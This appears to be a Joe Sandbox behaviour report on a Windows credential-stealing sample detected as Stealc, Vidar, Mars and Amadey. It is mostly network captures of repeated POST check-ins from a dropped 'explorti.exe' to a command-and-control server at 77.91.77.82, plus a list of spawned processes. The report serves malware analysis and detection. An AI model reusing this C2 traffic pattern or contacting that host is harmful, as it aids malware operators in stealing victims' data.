                                            Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 33 32 39 37 30 42 31 35 41 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                            Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7BB32970B15A82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                            Jul 2, 2024 08:28:34.155004025 CEST196INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0 (Ubuntu)
                                            Date: Tue, 02 Jul 2024 06:28:34 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Transfer-Encoding: chunked
                                            Connection: keep-alive
                                            Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                            Data Ascii: 7 <c><d>0


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            134192.168.2.46402677.91.77.82808040C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                            TimestampBytes transferredDirectionData
                                            Jul 2, 2024 08:28:34.275402069 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                            Content-Type: application/x-www-form-urlencoded
                                            Host: 77.91.77.82
                                            Content-Length: 4
                                            Cache-Control: no-cache
                                            Data Raw: 73 74 3d 73
                                            Data Ascii: st=s
                                            Jul 2, 2024 08:28:34.961213112 CEST219INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0 (Ubuntu)
                                            Date: Tue, 02 Jul 2024 06:28:34 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Transfer-Encoding: chunked
                                            Connection: keep-alive
                                            Refresh: 0; url = Login.php
                                            Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                            Data Ascii: 1 0


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            135192.168.2.46402777.91.77.82808040C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                            TimestampBytes transferredDirectionData
                                            Jul 2, 2024 08:28:34.972554922 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                                            Content-Type: application/x-www-form-urlencoded
                                            Host: 77.91.77.82
                                            Content-Length: 154
                                            Cache-Control: no-cache
                                            Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 33 32 39 37 30 42 31 35 41 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                            Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7BB32970B15A82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                            Jul 2, 2024 08:28:35.660587072 CEST196INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0 (Ubuntu)
                                            Date: Tue, 02 Jul 2024 06:28:35 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Transfer-Encoding: chunked
                                            Connection: keep-alive
                                            Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                            Data Ascii: 7 <c><d>0


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            136192.168.2.46402877.91.77.82808040C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                            TimestampBytes transferredDirectionData
                                            Jul 2, 2024 08:28:35.774734974 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                            Content-Type: application/x-www-form-urlencoded
                                            Host: 77.91.77.82
                                            Content-Length: 4
                                            Cache-Control: no-cache
                                            Data Raw: 73 74 3d 73
                                            Data Ascii: st=s
                                            Jul 2, 2024 08:28:36.461421013 CEST219INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0 (Ubuntu)
                                            Date: Tue, 02 Jul 2024 06:28:36 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Transfer-Encoding: chunked
                                            Connection: keep-alive
                                            Refresh: 0; url = Login.php
                                            Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                            Data Ascii: 1 0


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            137192.168.2.46402977.91.77.82808040C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                            TimestampBytes transferredDirectionData
                                            Jul 2, 2024 08:28:36.469779015 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                                            Content-Type: application/x-www-form-urlencoded
                                            Host: 77.91.77.82
                                            Content-Length: 154
                                            Cache-Control: no-cache
                                            Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 33 32 39 37 30 42 31 35 41 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                            Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7BB32970B15A82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                            Jul 2, 2024 08:28:37.363393068 CEST196INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0 (Ubuntu)
                                            Date: Tue, 02 Jul 2024 06:28:37 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Transfer-Encoding: chunked
                                            Connection: keep-alive
                                            Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                            Data Ascii: 7 <c><d>0


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            138192.168.2.46403077.91.77.82808040C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                            TimestampBytes transferredDirectionData
                                            Jul 2, 2024 08:28:37.482202053 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                            Content-Type: application/x-www-form-urlencoded
                                            Host: 77.91.77.82
                                            Content-Length: 4
                                            Cache-Control: no-cache
                                            Data Raw: 73 74 3d 73
                                            Data Ascii: st=s
                                            Jul 2, 2024 08:28:38.169363976 CEST219INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0 (Ubuntu)
                                            Date: Tue, 02 Jul 2024 06:28:38 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Transfer-Encoding: chunked
                                            Connection: keep-alive
                                            Refresh: 0; url = Login.php
                                            Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                            Data Ascii: 1 0


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            139192.168.2.46403177.91.77.82808040C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                            TimestampBytes transferredDirectionData
                                            Jul 2, 2024 08:28:38.186132908 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                                            Content-Type: application/x-www-form-urlencoded
                                            Host: 77.91.77.82
                                            Content-Length: 154
                                            Cache-Control: no-cache
                                            Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 33 32 39 37 30 42 31 35 41 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                            Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7BB32970B15A82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                            Jul 2, 2024 08:28:38.880000114 CEST196INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0 (Ubuntu)
                                            Date: Tue, 02 Jul 2024 06:28:38 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Transfer-Encoding: chunked
                                            Connection: keep-alive
                                            Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                            Data Ascii: 7 <c><d>0


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            140192.168.2.46403277.91.77.82808040C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                            TimestampBytes transferredDirectionData
                                            Jul 2, 2024 08:28:38.995649099 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                            Content-Type: application/x-www-form-urlencoded
                                            Host: 77.91.77.82
                                            Content-Length: 4
                                            Cache-Control: no-cache
                                            Data Raw: 73 74 3d 73
                                            Data Ascii: st=s
                                            Jul 2, 2024 08:28:39.689605951 CEST219INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0 (Ubuntu)
                                            Date: Tue, 02 Jul 2024 06:28:39 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Transfer-Encoding: chunked
                                            Connection: keep-alive
                                            Refresh: 0; url = Login.php
                                            Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                            Data Ascii: 1 0


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            141192.168.2.46403377.91.77.82808040C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                            TimestampBytes transferredDirectionData
                                            Jul 2, 2024 08:28:39.699167967 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                                            Content-Type: application/x-www-form-urlencoded
                                            Host: 77.91.77.82
                                            Content-Length: 154
                                            Cache-Control: no-cache
                                            Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 33 32 39 37 30 42 31 35 41 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                            Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7BB32970B15A82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                            Jul 2, 2024 08:28:40.399029016 CEST196INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0 (Ubuntu)
                                            Date: Tue, 02 Jul 2024 06:28:40 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Transfer-Encoding: chunked
                                            Connection: keep-alive
                                            Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                            Data Ascii: 7 <c><d>0


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            142192.168.2.46403477.91.77.82808040C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                            TimestampBytes transferredDirectionData
                                            Jul 2, 2024 08:28:40.510922909 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                            Content-Type: application/x-www-form-urlencoded
                                            Host: 77.91.77.82
                                            Content-Length: 4
                                            Cache-Control: no-cache
                                            Data Raw: 73 74 3d 73
                                            Data Ascii: st=s
                                            Jul 2, 2024 08:28:41.211572886 CEST219INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0 (Ubuntu)
                                            Date: Tue, 02 Jul 2024 06:28:41 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Transfer-Encoding: chunked
                                            Connection: keep-alive
                                            Refresh: 0; url = Login.php
                                            Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                            Data Ascii: 1 0


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            143192.168.2.46403577.91.77.82808040C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                            TimestampBytes transferredDirectionData
                                            Jul 2, 2024 08:28:41.224298000 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                                            Content-Type: application/x-www-form-urlencoded
                                            Host: 77.91.77.82
                                            Content-Length: 154
                                            Cache-Control: no-cache
                                            Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 33 32 39 37 30 42 31 35 41 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                            Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7BB32970B15A82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                            Jul 2, 2024 08:28:42.456830025 CEST196INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0 (Ubuntu)
                                            Date: Tue, 02 Jul 2024 06:28:41 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Transfer-Encoding: chunked
                                            Connection: keep-alive
                                            Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                            Data Ascii: 7 <c><d>0
                                            Jul 2, 2024 08:28:42.456850052 CEST196INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0 (Ubuntu)
                                            Date: Tue, 02 Jul 2024 06:28:41 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Transfer-Encoding: chunked
                                            Connection: keep-alive
                                            Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                            Data Ascii: 7 <c><d>0
                                            Jul 2, 2024 08:28:42.456861019 CEST196INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0 (Ubuntu)
                                            Date: Tue, 02 Jul 2024 06:28:41 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Transfer-Encoding: chunked
                                            Connection: keep-alive
                                            Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                            Data Ascii: 7 <c><d>0


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            144192.168.2.46403677.91.77.82808040C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                            TimestampBytes transferredDirectionData
                                            Jul 2, 2024 08:28:42.571511984 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                            Content-Type: application/x-www-form-urlencoded
                                            Host: 77.91.77.82
                                            Content-Length: 4
                                            Cache-Control: no-cache
                                            Data Raw: 73 74 3d 73
                                            Data Ascii: st=s
                                            Jul 2, 2024 08:28:43.286710024 CEST219INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0 (Ubuntu)
                                            Date: Tue, 02 Jul 2024 06:28:43 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Transfer-Encoding: chunked
                                            Connection: keep-alive
                                            Refresh: 0; url = Login.php
                                            Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                            Data Ascii: 1 0


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            145192.168.2.46403777.91.77.82808040C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                            TimestampBytes transferredDirectionData
                                            Jul 2, 2024 08:28:43.299629927 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                                            Content-Type: application/x-www-form-urlencoded
                                            Host: 77.91.77.82
                                            Content-Length: 154
                                            Cache-Control: no-cache
                                            Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 33 32 39 37 30 42 31 35 41 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                            Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7BB32970B15A82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                            Jul 2, 2024 08:28:43.990112066 CEST196INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0 (Ubuntu)
                                            Date: Tue, 02 Jul 2024 06:28:43 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Transfer-Encoding: chunked
                                            Connection: keep-alive
                                            Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                            Data Ascii: 7 <c><d>0


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            146192.168.2.46403877.91.77.82808040C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                            TimestampBytes transferredDirectionData
                                            Jul 2, 2024 08:28:44.103450060 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                            Content-Type: application/x-www-form-urlencoded
                                            Host: 77.91.77.82
                                            Content-Length: 4
                                            Cache-Control: no-cache
                                            Data Raw: 73 74 3d 73
                                            Data Ascii: st=s


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            147192.168.2.46403977.91.77.82808040C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                            TimestampBytes transferredDirectionData
                                            Jul 2, 2024 08:28:44.118877888 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                                            Content-Type: application/x-www-form-urlencoded
                                            Host: 77.91.77.82
                                            Content-Length: 154
                                            Cache-Control: no-cache
                                            Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 33 32 39 37 30 42 31 35 41 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                            Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7BB32970B15A82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                            Jul 2, 2024 08:28:44.827042103 CEST196INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0 (Ubuntu)
                                            Date: Tue, 02 Jul 2024 06:28:44 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Transfer-Encoding: chunked
                                            Connection: keep-alive
                                            Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                            Data Ascii: 7 <c><d>0


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            148192.168.2.46404077.91.77.82808040C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                            TimestampBytes transferredDirectionData
                                            Jul 2, 2024 08:28:44.951704979 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                            Content-Type: application/x-www-form-urlencoded
                                            Host: 77.91.77.82
                                            Content-Length: 4
                                            Cache-Control: no-cache
                                            Data Raw: 73 74 3d 73
                                            Data Ascii: st=s
                                            Jul 2, 2024 08:28:45.670399904 CEST219INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0 (Ubuntu)
                                            Date: Tue, 02 Jul 2024 06:28:45 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Transfer-Encoding: chunked
                                            Connection: keep-alive
                                            Refresh: 0; url = Login.php
                                            Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                            Data Ascii: 1 0


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            149192.168.2.46404177.91.77.82808040C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                            TimestampBytes transferredDirectionData
                                            Jul 2, 2024 08:28:45.680202961 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                                            Content-Type: application/x-www-form-urlencoded
                                            Host: 77.91.77.82
                                            Content-Length: 154
                                            Cache-Control: no-cache
                                            Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 33 32 39 37 30 42 31 35 41 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                            Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7BB32970B15A82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                            Jul 2, 2024 08:28:46.369479895 CEST196INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0 (Ubuntu)
                                            Date: Tue, 02 Jul 2024 06:28:46 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Transfer-Encoding: chunked
                                            Connection: keep-alive
                                            Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                            Data Ascii: 7 <c><d>0


                                            Click to jump to process

                                            Click to jump to process

                                            Click to dive into process behavior distribution

                                            Click to jump to process

                                            Target ID:0
                                            Start time:02:26:17
                                            Start date:02/07/2024
                                            Path:C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe"
                                            Imagebase:0xde0000
                                            File size:2'453'504 bytes
                                            MD5 hash:EBE33B40CE854EDD8E39259A1B980A65
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:Borland Delphi
                                            Yara matches:
                                            • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.1852046462.0000000001ABE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000000.00000002.1850057063.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_MarsStealer, Description: Yara detected Mars stealer, Source: 00000000.00000002.1850057063.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                                            Reputation:low
                                            Has exited:true

                                            Target ID:2
                                            Start time:02:26:35
                                            Start date:02/07/2024
                                            Path:C:\Windows\SysWOW64\cmd.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe"
                                            Imagebase:0x240000
                                            File size:236'544 bytes
                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:true

                                            Target ID:3
                                            Start time:02:26:35
                                            Start date:02/07/2024
                                            Path:C:\Windows\System32\conhost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            Imagebase:0x7ff7699e0000
                                            File size:862'208 bytes
                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:true

                                            Target ID:4
                                            Start time:02:26:35
                                            Start date:02/07/2024
                                            Path:C:\Windows\SysWOW64\cmd.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\Local\Temp\ECGHCBGCBF.exe"
                                            Imagebase:0x240000
                                            File size:236'544 bytes
                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:false

                                            Target ID:5
                                            Start time:02:26:35
                                            Start date:02/07/2024
                                            Path:C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe"
                                            Imagebase:0x4b0000
                                            File size:1'867'264 bytes
                                            MD5 hash:93899CE9A453CF1E50E1182DA46190A9
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000005.00000002.1905744042.00000000004B1000.00000040.00000001.01000000.00000009.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000005.00000003.1865490061.00000000049C0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                            Antivirus matches:
                                            • Detection: 100%, Avira
                                            • Detection: 100%, Joe Sandbox ML
                                            Reputation:low
                                            Has exited:true

                                            Target ID:6
                                            Start time:02:26:35
                                            Start date:02/07/2024
                                            Path:C:\Windows\System32\conhost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            Imagebase:0x7ff7699e0000
                                            File size:862'208 bytes
                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:false

                                            Target ID:8
                                            Start time:02:26:40
                                            Start date:02/07/2024
                                            Path:C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe"
                                            Imagebase:0x7c0000
                                            File size:1'867'264 bytes
                                            MD5 hash:93899CE9A453CF1E50E1182DA46190A9
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000008.00000002.4133532873.00000000007C1000.00000040.00000001.01000000.0000000D.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000008.00000003.1899129257.0000000004F80000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                            Antivirus matches:
                                            • Detection: 100%, Avira
                                            • Detection: 100%, Joe Sandbox ML
                                            Reputation:low
                                            Has exited:false

                                            Target ID:11
                                            Start time:02:26:46
                                            Start date:02/07/2024
                                            Path:C:\Users\user\AppData\Local\Temp\1000006001\a37ec701f3.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Users\user\AppData\Local\Temp\1000006001\a37ec701f3.exe"
                                            Imagebase:0x120000
                                            File size:2'453'504 bytes
                                            MD5 hash:EBE33B40CE854EDD8E39259A1B980A65
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:Borland Delphi
                                            Yara matches:
                                            • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 0000000B.00000002.1970868241.0000000001414000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 0000000B.00000002.1969439309.0000000000121000.00000040.00000001.01000000.0000000E.sdmp, Author: Joe Security
